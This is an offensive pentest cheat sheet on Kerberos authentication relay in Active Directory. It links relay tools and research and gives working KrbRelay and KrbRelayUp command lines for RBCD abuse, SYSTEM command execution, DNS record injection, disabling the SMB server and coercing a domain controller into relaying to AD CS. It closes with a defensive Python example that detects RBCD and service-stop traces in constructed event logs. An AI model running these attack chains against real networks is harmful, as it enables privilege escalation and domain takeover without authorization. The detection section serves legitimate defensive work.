# Kerberos Relay

* <https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html>
* <https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html>
* <https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/>

## mitm6 + Kerberos DNS Relay + AD CS ESC8

* <https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/>

### CNAME Abuse

* <https://cymulate.com/blog/kerberos-authentication-relay-via-cname-abuse/>

## Tools

### KrbRelay

* <https://github.com/cube0x0/KrbRelay>
* <https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9>
* <https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html>

### KrbRelayUp

* <https://github.com/Dec0ne/KrbRelayUp>
* <https://www.microsoft.com/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/>
* <https://github.com/BronzeBee/DavRelayUp>
* <https://github.com/Dec0ne/DavRelayUp>

#### RELAY

Relay authentication to LDAP(S) with automatic machine creation and configure RBCD:

```
PS > .\KrbRelayUp.exe RELAY [-d|--Domain megacorp.local] [-dc|--DomainController DC01.megacorp.local] [-m|--Method RBCD] -c|--CreateNewComputerAccount [-cn|--ComputerName FAKEMACHINE$] [-cp|--ComputerPassword Passw0rd!]
```

Perform RBCD with UPNs:

```
PS > .\KrbRelayUp.exe RELAY -u2u -cn j.doe -cp Passw0rd!
```

{% content-ref url="/pages/hEqPC8druXtA7lMGmGf6#rbcd-with-upns" %}
[Resource-based Constrained](/pentest/infrastructure/ad/kerberos/delegation-abuse/rbcd.md#rbcd-with-upns)
{% endcontent-ref %}

#### SPAWN

Execute a command as NT AUTHORITY\SYSTEM via RBCD abuse:

```
PS > .\KrbRelayUp.exe SPAWN [-m|--Method RBCD] [-i|--Impersonate administrator] [-s|--ServiceName PwnSVC] [-sc|--ServiceCommand C:\Windows\System32\cmd.exe] -cn|--ComputerName FAKEMACHINE$ -cp|--ComputerPassword Passw0rd! [or -ch|--ComputerPasswordHash fc525c9683e8fe067095ba2ddc971889]
```

{% hint style="warning" %}
As [@ShitSecure](https://twitter.com/ShitSecure) mentioned, executing the binary as a .NET reflective assembly from PowerShell will fail: the PowerShell process has already initialized the COM security parameters for itself at launch, so `CoInitializeSecurity` will not pick up the new parameters that KrbRelay(Up) attempts to set.
{% endhint %}

### RemoteKrbRelay

* <https://habr.com/ru/articles/848542/>
* <https://github.com/CICADA8-Research/RemoteKrbRelay>
* <https://github.com/rtecCyberSec/RemoteKrbRelay/tree/ntlm>
* <https://github.com/OleFredrik1/remoteKrbRelayx>

### KrbRelay-SMBServer

* <https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html>
* <https://github.com/decoder-it/KrbRelay-SMBServer>
* <https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx>
* <https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with>

Stop/start services with Cmd:

```
Cmd > sc config LanmanServer start= disabled & sc stop LanmanServer & sc stop srv2 & sc stop srvnet
Cmd > sc config LanmanServer start= auto & sc start LanmanServer & sc start srv2 & sc start srvnet
```

Stop/start services with PowerShell and run the attack:

```
PS > Invoke-DNSUpdate -DNSName adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 10.10.13.37
PS > Set-Service -Name LanmanServer -StartupType Disabled; Stop-Service -Name LanmanServer -Force; Stop-Service -Name srv2 -Force; Stop-Service -Name srvnet -Force
PS > .\KrbRelay.exe -spn HTTP/ADCS.megacorp.local -redirecthost adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 445
$ dfscoerce.py -d megacorp.local -u snovvcrash -k -no-pass adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.megacorp.local
PS > Set-Service -Name LanmanServer -StartupType Automatic; Start-Service -Name LanmanServer; Start-Service -Name srv2; Start-Service -Name srvnet
```
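Both the RBCD chain above (`RELAY` creating a machine account and writing `msDS-AllowedToActOnBehalfOfOtherIdentity` on the target, then `SPAWN`) and the service stop/start steps used to free port 445 for KrbRelay-SMBServer leave traces that can be correlated on the defensive side. The following Python is an added example, not part of these notes or of any of the tools' code: it runs two checks over constructed Windows event records (Security 4741 computer-account creation and 5136 directory-object modification; System 7040 service start-type change and 7036 service state change). The event records and their flattened field names (`TargetUserName`, `AttributeValue`, `ServiceName`, `NewStartType`, ...) are simplified assumptions standing in for the real event XML, not captured telemetry.

```python
"""Two detection heuristics for the Kerberos-relay tradecraft on this page,
run over constructed (not real) Windows event records."""
from dataclasses import dataclass
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"


@dataclass
class Event:
    ts: datetime
    log: str        # "Security" or "System"
    event_id: int
    fields: dict    # simplified, flattened event data (assumption, see lead-in)


def detect_rbcd_relay(events, window=timedelta(minutes=10)):
    """Correlate a freshly created computer account (4741) with a write to the
    RBCD attribute (5136) whose security descriptor grants that new account's
    SID, within `window`. The 5136 AttributeValue for a security-descriptor
    attribute is SDDL, so the trustee SID appears literally in the value.
    Returns (new_computer, target_object_dn, seconds_between) tuples."""
    created = {}   # SID -> (creation time, sAMAccountName)
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.log == "Security" and ev.event_id == 4741:
            created[ev.fields["TargetSid"]] = (ev.ts, ev.fields["TargetUserName"])
        elif (ev.log == "Security" and ev.event_id == 5136
              and ev.fields.get("AttributeLDAPDisplayName") == RBCD_ATTR):
            sddl = ev.fields.get("AttributeValue", "")
            for sid, (t0, name) in created.items():
                if sid in sddl and timedelta(0) <= ev.ts - t0 <= window:
                    hits.append((name, ev.fields["ObjectDN"],
                                 (ev.ts - t0).total_seconds()))
    return hits


def detect_smb_server_disabled(events):
    """Flag the Server service (LanmanServer) or its srv2/srvnet drivers being
    disabled (7040) or stopped (7036): a host-local relay listening on 445
    needs exactly this to bind the port. Returns (event_id, service, state)."""
    watched = {"server", "lanmanserver", "srv2", "srvnet"}
    hits = []
    for ev in events:
        if ev.log != "System":
            continue
        svc = ev.fields.get("ServiceName", "").lower()
        if svc not in watched:
            continue
        if ev.event_id == 7040 and "disabled" in ev.fields.get("NewStartType", "").lower():
            hits.append((7040, svc, "disabled"))
        elif ev.event_id == 7036 and ev.fields.get("State", "").lower() == "stopped":
            hits.append((7036, svc, "stopped"))
    return hits


# Constructed sample events: one RBCD chain (new account granted on WS01
# 40 s after creation), one unrelated RBCD write hours later with a SID that
# was never created in the window, and the 445-freeing service changes.
T0 = datetime(2025, 1, 1, 12, 0, 0)
NEW_SID = "S-1-5-21-1111-2222-3333-1105"
SAMPLE_EVENTS = [
    Event(T0, "Security", 4741,
          {"TargetUserName": "FAKEMACHINE$", "TargetSid": NEW_SID,
           "SubjectUserName": "WS01$"}),
    Event(T0 + timedelta(seconds=40), "Security", 5136,
          {"ObjectDN": "CN=WS01,CN=Computers,DC=megacorp,DC=local",
           "AttributeLDAPDisplayName": RBCD_ATTR,
           "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + NEW_SID + ")"}),
    Event(T0 + timedelta(minutes=30), "System", 7040,
          {"ServiceName": "Server", "OldStartType": "auto start",
           "NewStartType": "disabled"}),
    Event(T0 + timedelta(minutes=30, seconds=2), "System", 7036,
          {"ServiceName": "Server", "State": "stopped"}),
    Event(T0 + timedelta(minutes=30, seconds=3), "System", 7036,
          {"ServiceName": "srv2", "State": "stopped"}),
    Event(T0 + timedelta(minutes=31), "System", 7036,
          {"ServiceName": "Spooler", "State": "running"}),
    Event(T0 + timedelta(hours=5), "Security", 5136,
          {"ObjectDN": "CN=SQL01,CN=Computers,DC=megacorp,DC=local",
           "AttributeLDAPDisplayName": RBCD_ATTR,
           "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111-2222-3333-9999)"}),
]

if __name__ == "__main__":
    for hit in detect_rbcd_relay(SAMPLE_EVENTS):
        print("RBCD relay chain:", hit)
    for hit in detect_smb_server_disabled(SAMPLE_EVENTS):
        print("SMB server change:", hit)
```

The RBCD check keys on the SID rather than the account name because the SDDL written to the attribute carries only the SID; the time window keeps a legitimate, long-standing delegation from matching a coincidental later account creation. The service check treats the display name `Server` and the short name `LanmanServer` as the same service, since 7040/7036 record the display name.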


